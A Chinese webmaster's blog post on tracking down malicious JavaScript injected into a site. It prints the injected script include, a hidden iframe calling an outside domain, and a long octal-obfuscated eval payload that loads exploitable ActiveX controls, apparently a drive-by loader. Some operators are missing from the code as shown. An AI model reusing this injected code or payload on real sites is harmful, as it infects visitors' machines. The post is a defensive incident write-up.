浅谈站长如何排除网站挂马

键词优化的QQ个性签名么?一开始以为只是杀软误报，加上我也没有装杀毒软件(一直没中过病毒)，所以就没怎么管他?

　　今天起来用新手机((*^__^*) 嘻嘻……，俺买了黑莓8100)打开百度搜索一下QQ个性签名，晕，排名不知道掉到第几页了。我就郁闷了，自己的SEO优化一直都是很温柔的上的啊，怎么会被降权了?于是就猜想可能真的被挂马了，因为是也算是刚认识的朋友，当然要帮忙处理一下这些琐碎的问题啦。回来之后，马上启用德国杀软小红伞，“滴滴”两声，打开QQ个性签名的时候报警了。于是打开html代码查看，既然没有iframe，这就奇怪了。于是清理缓存再次打开网页，根据小红伞提供的资料找到了报警的文件：info[1].js，打开得到下面的代码：

var az=document.cookie;
var za=az.indexOf(”qqqq”);
if(za!=-1){}else{var expires=new Date();expires.setTime(expires.getTime() 24*60*60*1000);
document.cookie=”qqqq=web;expires=” expires.toGMTString();
document.writeln(”<iframe src=http:////kkwwkkc.cn//10//zz.htm width=100 height=0><//iframe>”);window.status=” “;}

我想问题应该出在js代码上，于是在代码搜索js，一个是51la的统计的js，另外一个是div.js，51la的自然可以排除，所以我就打开div.js,然后看到了下面“此地无银三百两”的网址代码（红色字体的），一路跟踪下去，果然发现可疑迹象。

// JavaScript Document
function showdiv(divnum,divbefor,id){
for(i=1;i<=divnum;i ){
try{
if(i==divbefor){
document.getElementById(id i).style.display=”inline”;
}else{
document.getElementById(id i).style.display=”none”;
}
}catch(e){ }
}
}
function menuFix(){}
document.writeln(”<script src=http:////xishiyi.com//images//main//info.js><//script>”);

跟踪代码：http:////xishiyi.com//images//main//info.js
　　firefox直接输入，转换得到地址如下http://www.91q.org/templets/images/div.js打开代码如下：

var az=document.cookie;
var za=az.indexOf(”qqqq”);
if(za!=-1){}else{var expires=new Date();expires.setTime(expires.getTime() 24*60*60*1000);
document.cookie=”qqqq=web;expires=” expires.toGMTString();
document.writeln(”<iframe src=http:////kkwwkkc.cn//10//zz.htm width=100 height=0><//iframe>”);window.status=” “;}

继续iframe跟踪：http://kkwwkkc.cn/10/zz.htm
打开代码如下：

<iframe src=123.htm width=100 height=0></iframe>
<script language=”javascript” type=”text/javascript” src=”http://js.users.51.la/2191926.js”></script>
<noscript><a href=”http://www.51.la/?2191926″ target=”_blank”><img alt=”&#x6211;&#x8981;&#x5566;&#x514D;&#x8D39;&#x7EDF;&#x8BA1;” src=”http://img.users.51.la/2191926.asp” style=”border:none” /></a></noscript>

继续iframe跟踪：http://kkwwkkc.cn/10/123.htm
打开得到如下王八代码：

<script>
eval(”/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/42/74/151/146/162/141/155/145/40/167/151/144/164/150/75/62/60/40/150/145/151/147/150/164/75/60/40/163/162/143/75/146/154/141/163/150/56/150/164/155/76/74/57/151/146/162/141/155/145/76/42/51/73/15/12/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/42/74/151/146/162/141/155/145/40/167/151/144/164/150/75/61/60/60/40/150/145/151/147/150/164/75/60/40/163/162/143/75/141/163/56/150/164/155/76/74/57/151/146/162/141/155/145/76/42/51/73/15/12/167/151/156/144/157/167/56/163/164/141/164/165/163/75/42/55614/61020/42/73/15/12/167/151/156/144/157/167/56/157/156/145/162/162/157/162/75/146/165/156/143/164/151/157/156/50/51/173/162/145/164/165/162/156/40/164/162/165/145/73/175/15/12/151/146/50/156/141/166/151/147/141/164/157/162/56/165/163/145/162/101/147/145/156/164/56/164/157/114/157/167/145/162/103/141/163/145/50/51/56/151/156/144/145/170/117/146/50/42/155/163/151/145/40/67/42/51/75/75/55/61/51/15/12/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/42/74/151/146/162/141/155/145/40/167/151/144/164/150/75/62/60/40/150/145/151/147/150/164/75/60/40/163/162/143/75/61/64/56/150/164/155/76/74/57/151/146/162/141/155/145/76/42/51/73/15/12/164/162/171/173/166/141/162/40/146/73/15/12/166/141/162/40/147/147/75/156/145/167/40/101/143/164/151/166/145/130/117/142/152/145/143/164/50/42/107/114/111/105/104/157/167/156/56/111/105/104/157/167/156/56/61/42/51/73/175/15/12/143/141/164/143/150/50/146/51/173/175/73/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/15/12/146/151/156/141/154/154/171/173/151/146/50/146/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/42/74/151/146/162/141/155/145/40/167/151/144/164/150/75/61/60/60/40/150/145/151/147/150/164/75/60/40/163/162/143/75/154/172/56/150/164/155/76/74/57/151/146/162/141/155/145/76/42/51/73/175/175/15/12/164/162/171/173/166/141/162/40/155/73/15/12/166/141/162/40/150/150/75/156/145/167/40/101/143/164/151/166/145/130/117/142/152/145/143/164/50/42/104/157/167/156/154/157/141/144/145/162/56/104/114/157/141/144/145/162/56/61/42/51/73/175/15/12/143/141/164/143/150/50/155/51/173/175/73/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/15/12/146/151/156/141/154/154/171/173/151/146/50/155/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/42/74/151/146/162/141/155/145/40/167/151/144/164/150/75/61/60/60/40/150/145/151/147/150/164/75/60/40/163/162/143/75/163/151/156/141/56/150/164/155/76/74/57/151/146/162/141/155/145/76/42/51/73/175/175/15/12/164/162/171/173/166/141/162/40/156/73/15/12/166/141/162/40/154/154/75/156/145/167/40/101/143/164/151/166/145/130/117/142/152/145/143/164/50/42/163/156/160/166/167/56/123/156/141/160/163/150/157/164/40/126/151/145/167/145/162/40/103/157/156/164/162/157/154/56/61/42/51/73/175/15/12/143/141/164/143/150/50/156/51/173/175/73/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/15/12/146/151/156/141/154/154/171/173/151/146/50/156/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/42/74/151/146/162/141/155/145/40/167/151/144/164/150/75/61/60/60/40/150/145/151/147/150/164/75/60/40/163/162/143/75/157/146/146/151/143/145/56/150/164/155/76/74/57/151/146/162/141/155/145/76/42/51/73/175/175/15/12/164/162/171/173/166/141/162/40/142/73/15/12/166/141/162/40/155/155/75/156/145/167/40/101/143/164/151/166/145/130/117/142/152/145/143/164/50/42/116/103/124/101/165/144/151/157/106/151/154/145/62/56/101/165/144/151/157/106/151/154/145/62/56/62/42/51/73/175/15/12/143/141/164/143/150/50/142/51/173/175/73/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/40/15/12/146/151/156/141/154/154/171/173/151/146/50/142/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/42/74/151/146/162/141/155/145/40/167/151/144/164/150/75/61/60/60/40/150/145/151/147/150/164/75/60/40/163/162/143/75/116/103/124/101/165/144/151/157/106/151/154/145/56/150/164/155/76/74/57/151/146/162/141/155/145/76/42/51/73/175/175/15/12/146/165/156/143/164/151/157/156/40/164/145/163/164/50/51/15/12/173/15/12/162/162/157/157/170/170/40/75/40/42/111/105/122/42/40/53/40/42/120/103/164/154/56/111/42/40/53/40/42/105/122/120/42/40/53/40/42/103/164/154/56/61/42/73/15/12/164/162/171/15/12/173/15/12/114/151/153/145/40/75/40/156/145/167/40/101/143/164/151/166/145/130/117/142/152/145/143/164/50/162/162/157/157/170/170/51/73/15/12/175/143/141/164/143/150/50/145/162/162/157/162/51/173/162/145/164/165/162/156/73/175/15/12/166/166/166/166/166/40/75/40/114/151/153/145/56/120/154/141/171/145/162/120/162/157/160/145/162/164/171/50/42/120/122/117/104/125/103/124/126/105/122/123/111/117/116/42/51/73/15/12/151/146/50/166/166/166/166/166/74/75/42/66/56/60/56/61/64/56/65/65/62/42/51/15/12/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/42/74/151/146/162/141/155/145/40/167/151/144/164/150/75/61/60/60/40/150/145/151/147/150/164/75/60/40/163/162/143/75/162/145/61/60/56/150/164/155/76/74/57/151/146/162/141/155/145/76/42/51/73/15/12/145/154/163/145/15/12/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/42/74/151/146/162/141/155/145/40/167/151/144/164/150/75/61/60/60/40/150/145/151/147/150/164/75/60/40/163/162/143/75/162/145/61/61/56/150/164/155/76/74/57/151/146/162/141/155/145/76/42/51/73/15/12/175/15/12/164/145/163/164/50/51/73″)
</script>

　　鄙人才疏学浅，看不懂转化了的代码啥意思，不想去转换，知道被挂马就ok了，最后是跟朋友说让他去掉那个代码，清理缓存重新打开网页，ok，没问题了。

　　写这篇文章的用意在意告诉各位，要注意自己网站的安全，如果发现挂马，不要错过每一个细节，首先仔细检查html页面有没有调用其他莫名的网站的东西，然后仔细分析自己页面的js代码，iframe是黑客们最常用的手段。实例一篇，希望对各位有用。这是我第一次抓马，经过自己的分析既然抓到了，很开心，特此分享……